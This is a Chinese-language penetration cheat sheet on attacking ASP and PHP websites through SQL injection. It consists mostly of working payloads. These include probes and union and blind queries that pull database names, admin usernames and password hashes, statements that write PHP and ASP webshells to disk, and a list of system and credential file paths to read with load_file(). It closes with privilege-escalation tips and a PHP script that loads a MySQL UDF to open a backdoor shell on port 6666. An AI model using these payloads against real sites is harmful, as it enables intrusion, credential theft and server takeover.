滲透筆記之腳本入侵(ASP、PHP)
簡單判定有無漏洞:
粗略型:'
1. 數(shù)字型:
and 1=1 and 1=2
2.字符型:
' and '1'='1 ' and '1'='2
3.搜索型:
%' and 1=1 and '%'='% 或者 %' and 1=2 and '%'='%
(PS:第三個(gè)大家可能不常用,他一般在ASP腳本中一般寫成:keyword=request(”keyword”),賦值“KYO”到SQL語句中的時(shí)候即變?yōu)镾elect * from 表名 where keyword like ‘%KYO%’)
簡單判斷數(shù)據(jù)庫信息:
語句型(IIS報(bào)不報(bào)錯(cuò),語句自己區(qū)分):
and user>0
and (select count(*) from msysobjects)>0 ……(頁面錯(cuò)誤為access數(shù)據(jù)庫)
and (select count(*) from sysobjects)>0 ……(頁面正常為MSSQL數(shù)據(jù)庫)
and db_name()>0 ……(爆數(shù)據(jù)庫名)
version>0 (爆SQLServer版本信息以及服務(wù)器操作系統(tǒng)的類型和版本信息)
粗略型:加 ’(根據(jù)服務(wù)器報(bào)錯(cuò)的信息來判斷)
加 ;--(;和--MSSQL數(shù)據(jù)庫里面一般都有, ; 表示分離,-- 則是注釋符ACCESS數(shù)據(jù)庫里沒有)
判斷MYSQL權(quán)限:
and 0<>(Select ISSRVROLEMEMBER(’sysadmin’))--(頁面正常則為SA)
and 0<>(Select IS_MEMBER(’db_owner’))--(頁面正常則為db_owner)
and 0<>(Select IS_MEMBER(’public’))--(頁面正常則是public)
PS:以上方法適用于參數(shù)是int的時(shí)候,若為字符型,需在參數(shù)后添加’和查詢語句后添加;--
開始進(jìn)行SQL注入(ACCESS):
猜解表名:
and 0<>(select count(*) from 表名) 或and exists(Select * from 表名)
and 1<(select count(*) from 表名) (頁面錯(cuò)誤說明帳號(hào)數(shù)目就是1個(gè))
猜解字段:
and exists(Select 字段名 from 表名)(頁面正常存在,不正常不存在)
猜解用戶名和密碼長度:
and(Select top 1 len(列名) from 表名)>N (TOP表示把最前面的一條記錄提取出來;N為變換猜解的列長度,頁面錯(cuò)誤即說明該列長度為N)
如:and 1=(select count(*) from user where len(name)>6) 錯(cuò)誤
and 1=(select count(*) from user where len(name)>5) 正確
則長度是6
猜解用戶名和密碼:and (select top 1 asc(mid(列名,1,1)) from 表名)>0
如:and (select top 1 asc(mid(user,1,1)) from name)>96頁面正常
and (select top 1 asc(mid(user,1,1)) from name)>97頁面錯(cuò)誤
則ASCLL碼為97
PS:因?yàn)镸D5的密文只有16,18,32,40這幾個(gè),所以猜解密碼的時(shí)候只要試一試15,16,17,18,31,32,39,40等就簡單些。
開始進(jìn)行SQL注入(MYSQL):
爆出表名和字段: having 1=1--
插入新記錄: group by users.ID having 1=1--
group by users.ID, users.username, users.password, users.privs having 1=1--
; insert into users values( 666, attacker, foobar, 0xffff )--
猜解表名:and (select top 1 name from sysobjects where xtype='u')>0 (獲得第一個(gè)表名)
and (select top 1 name from sysobjects where xtype='u' and name not in ('user'))>0(獲得第二個(gè)表名)
………………
猜解列名:and (select top 1 col_name(object_id('字段'),1) from sysobjects)>0(得到字段的第一個(gè)列名)
猜解字段內(nèi)容:and (select top 1 列名 from [表名])>0
如:and (select top 1 username from [admin])>0 (獲取用戶名)
and (select top 1 password from [admin])>0 (獲取密碼)
導(dǎo)出webshell:
1.利用SQL執(zhí)行命令功能導(dǎo)出WebShell:
SELECT '<%execute request("a")%>' into [vote] in 'd:\web\x.asp;.xls' 'excel 8.0;' from vote
PS:需提供SQL執(zhí)行功能且知道絕對(duì)路徑方可使用(vote為已知表段)
2.建立一個(gè)有一個(gè)A字段的表 表名為a 字段類型為字符長度為50,在表A的a字段插入密碼為90sec的一句話木馬,把表a的內(nèi)容導(dǎo)出為物理路徑的一個(gè)EXCEL文件,導(dǎo)出為EXCEL后在利用IIS解析漏洞就可以變成小馬了。
語句:
create table cmd (a varchar(50))
insert into cmd (a) values ('<%execute request("90sec")%>')
select * into [a] in 'f:\host\qhdyxt\web\a.asp;.xls' 'excel 4.0;' from cmd
drop table cmd
復(fù)制代碼
提權(quán):
1.system權(quán)限下直接添加賬號(hào)(可能的話):直接CMD命令添加
2.使用shell自帶的提權(quán)功能:Serv_U,pcAnywhere,Radmin密碼讀取等,全部試一試
3.利用系統(tǒng)的漏洞進(jìn)行溢出提權(quán):利用巴西烤肉提權(quán),在CMD命令一行里輸入C:\recycler\1.exe空格“CMD命令”,1.exe就是巴西烤肉咯
4.用軟件的漏洞來提權(quán)(這個(gè)機(jī)會(huì)比較渺茫,個(gè)人沒有成功過)
5.在conn.asp webconfig.asp等文件查找SA密碼或者查找inc.php 等文件里面的ROOT密碼(可以用CMD語句查找,如:利用CMD命令 dir /s d:\conn.asp 或者 dir /s d:\*inc*.php 來查找配置文件)
PHP+MYSQL
1.漏洞判斷同上。
2.數(shù)據(jù)庫信息判斷:
1.數(shù)據(jù)庫類型,簡單的直接利用上面的相關(guān)語句就可以
2.爆數(shù)據(jù)庫的版本信息,庫名以及用戶名(前提得到字段數(shù)及可利用字段):and 1=2 union select 1,2,3,4,version(),database(),user(),8--
或者:+union+select+1,2,,3,4,database(),version(),user(),8 (要在參數(shù)前加-)
3.數(shù)據(jù)庫權(quán)限:and ord(mid(user(),1,1))=114 /* (頁面正常說明為root)
4.爆操作系統(tǒng)相關(guān)信息:and 1=2 union all select @@global.version_compile_os from mysql.user /*
3.開始注入:
1.查詢字段: (1)用union聯(lián)合查詢:and 1=1 union select 1,2,3,4,5……
(2)用order by 查詢“order by *--
2.爆可利用字段:and 1=2 union select 1,2,3,4,5,6,7……--
或者+union+select+1,2,3,4,5,6,7…… (要在參數(shù)前加-)
PS:不用猜解可用字段暴數(shù)據(jù)庫信息(部分網(wǎng)站適用):
and 1=2 union all select version() /*
and 1=2 union all select database() /*
and 1=2 union all select user() /*
第一種方法: 暴庫
3.暴庫 (前提是mysql>5.0,因?yàn)镸ysql 5 以上有內(nèi)置庫 information_schema,存儲(chǔ)著mysql的所有數(shù)據(jù)庫和表結(jié)構(gòu)信息):
and 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1
4.猜解表名:and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=數(shù)據(jù)庫(十六進(jìn)制) limit 0(開始的記錄,0為第一個(gè)開始記錄),1(顯示1條記錄)--
5.猜解字段:and 1=2 Union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=表名(十六進(jìn)制)limit 0,1
6.爆密碼:and 1=2 Union select 1,2,3,用戶名段,5,6,7,密碼段,8,9 from 表名 limit 0,1
PS:高級(jí)用法:Union select 1,2,3concat(用戶名段,0x3c,密碼段),5,6,7,8,9 from 表名 limit 0,1
第二種方法:利用虛擬庫information_schema 爆表
3.+union+select+1,2,3,4,table_name,5+from+information_schema.tables+where+table_schema=數(shù)據(jù)庫名的16進(jìn)制+limit+1,1
或者and 1=2 union select 1,2,3,4,table_name,5 from information_schema.tables where table_schema=數(shù)據(jù)庫名的16進(jìn)制 limit 1,1--
PS: limit 1,1可以變化,查詢下一個(gè)
4.利用表爆字段:+union+select+1,2,3,4,column_name,5+from+information_schema.columns+where+table_name=爆出來的字段的16進(jìn)制 或者:and 1=2 union select 1,2,3,4,column_name,5 from information_schema.columns where table_name=爆出來的字段的16進(jìn)制--
5.爆用戶名和密碼:+union+select+1,2,3,用戶名字段,密碼字段,6+from+管理表
或者:and 1=2 union select 1,2,3,用戶名字段,密碼字段,6 from 管理表--
(PS:一次性爆表:.+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+table_name),6+from+information_schema.columns+where+table_schema=數(shù)據(jù)庫名的16進(jìn)制
一次性爆出所有字段:+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+column_name),6+from+information_schema.columns+where+table_schema=數(shù)據(jù)庫名的16進(jìn)制
一次性爆密碼和用戶名:+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+用戶名,0x5f,密碼),6+from+管理表)
PS:這里面所有的+號(hào)是代替空格的,還可以用/**/來代替,不同情況,不同分析!但是參數(shù)前必須加-4.拿webshell
1.導(dǎo)出一句話拿WebShell
Drop TABLE IF EXISTS temp;Create TABLE temp(cmd text NOT NULL); Insert INTO temp (cmd) VALUES('<? php eval($_POST[cmd]);?>'); Select cmd from temp into out file 'F:/wwwroot/eval.php'; Drop TABLE IF EXISTS temp;
或者:
Select '<? php eval($_POST[cmd]);?>' into outfile 'F:/wwwroot/eval.php';
復(fù)制代碼
PS:eval.php是導(dǎo)入對(duì)象
5.提權(quán):
第一種方法:直接寫馬(Root權(quán)限)
條件:1、知道站點(diǎn)物理路徑
2、有足夠大的權(quán)限(可以用select …. from mysql.user測試)
3、magic_quotes_gpc()=OFF
select ‘<?php eval($_POST[cmd])?>’ into outfile ‘物理路徑’
and 1=2 union all select 一句話HEX值 into outfile '路徑'
load_file() 常用路徑:
1、 replace(load_file(0×2F6574632F706173737764),0×3c,0×20)
2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
上面兩個(gè)是查看一個(gè)PHP文件里完全顯示代碼.有些時(shí)候不替換一些字符,如 “<” 替換成”空格” 返回的是網(wǎng)頁.而無法查看到代碼.
3、 load_file(char(47)) 可以列出FreeBSD,Sunos系統(tǒng)根目錄
4、/etc tpd/conf tpd.conf或/usr/local/apche/conf tpd.conf 查看linux APACHE虛擬主機(jī)配置文件
5、c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf 查看WINDOWS系統(tǒng)apache文件
6、c:/Resin-3.0.14/conf/resin.conf 查看jsp開發(fā)的網(wǎng)站 resin文件配置信息.
7、c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf 查看linux系統(tǒng)配置的JSP虛擬主機(jī)
8、d:\APACHE\Apache2\conf\httpd.conf
9、C:\Program Files\mysql\my.ini
10、../themes/darkblue_orange/layout.inc.php phpmyadmin 爆路徑
11、 c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虛擬主機(jī)配置文件
12、 /usr/local/resin-3.0.22/conf/resin.conf 針對(duì)3.0.22的RESIN配置文件查看
13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上
14 、/usr/local/app/apache2/conf/extra tpd-vhosts.conf APASHE虛擬主機(jī)查看
15、 /etc/sysconfig/iptables 本看防火墻策略
16 、 usr/local/app/php5 b/php.ini PHP 的相當(dāng)設(shè)置
17 、/etc/my.cnf MYSQL的配置文件
18、 /etc/redhat-release 紅帽子的系統(tǒng)版本
19 、C:\mysql\data\mysql\user.MYD 存在MYSQL系統(tǒng)中的用戶密碼
20、/etc/sysconfig/network-scripts/ifcfg-eth0 查看IP.
21、/usr/local/app/php5 b/php.ini //PHP相關(guān)設(shè)置
22、/usr/local/app/apache2/conf/extra tpd-vhosts.conf //虛擬網(wǎng)站設(shè)置
23、C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
24、c:\windows\my.ini
25、c:\boot.ini
網(wǎng)站常用配置文件 config.inc.php、config.php。load_file()時(shí)要用replace(load_file(HEX),char(60),char(32))
注:
Char(60)表示 <
Char(32)表示 空格
第二種方法:直接在PHPSPY新建一個(gè)PHP文件.
輸入以下的內(nèi)容
$link=mysql_connect('127.0.0.1','root','root');
if (!$link) {die('Could NOt Connect The Database!: ' . mysql_error());};
echo "Good Boy.Connected!";
//這里的root\root就是從my.ini中讀取的用戶和密碼.
@mysql_select_db('mysql') or die ('use database mysql failed!');
echo "Yes You Did!";
//這里選擇使用MySQL數(shù)據(jù)庫表.當(dāng)然你也可以選擇別的,如test.
$query="Create Function Shell RETURNS INTEGER SONAME 'd:\\wwwroot\\FurQ.dll';";
@$result = mysql_query($query, $link) or die ("Create Function Failed!");
echo "Goddess...Successed!";
//這兩句話是關(guān)鍵,執(zhí)行MySQL的創(chuàng)建函數(shù)語句.將d:\wwwroot\furq.dll中的Shell函數(shù)創(chuàng)建進(jìn)MySQL中.使得MySQL可以執(zhí)行這個(gè)Shell函數(shù).
$query="Select Shell();";
@$result = mysql_query($query, $link) or die ("Execute failed");
echo "Congratulations! Connect The Port 6666 Of This Server VS password:FurQ";
//這一步是執(zhí)行這個(gè)Shell函數(shù),打開服務(wù)器的6666端口.
?>
然后再執(zhí)行,由于繼承的是MySQL的權(quán)限,而Win系統(tǒng)下MySQL默認(rèn)以服務(wù)安裝,所以得到的Shell為LocalSystem權(quán)限
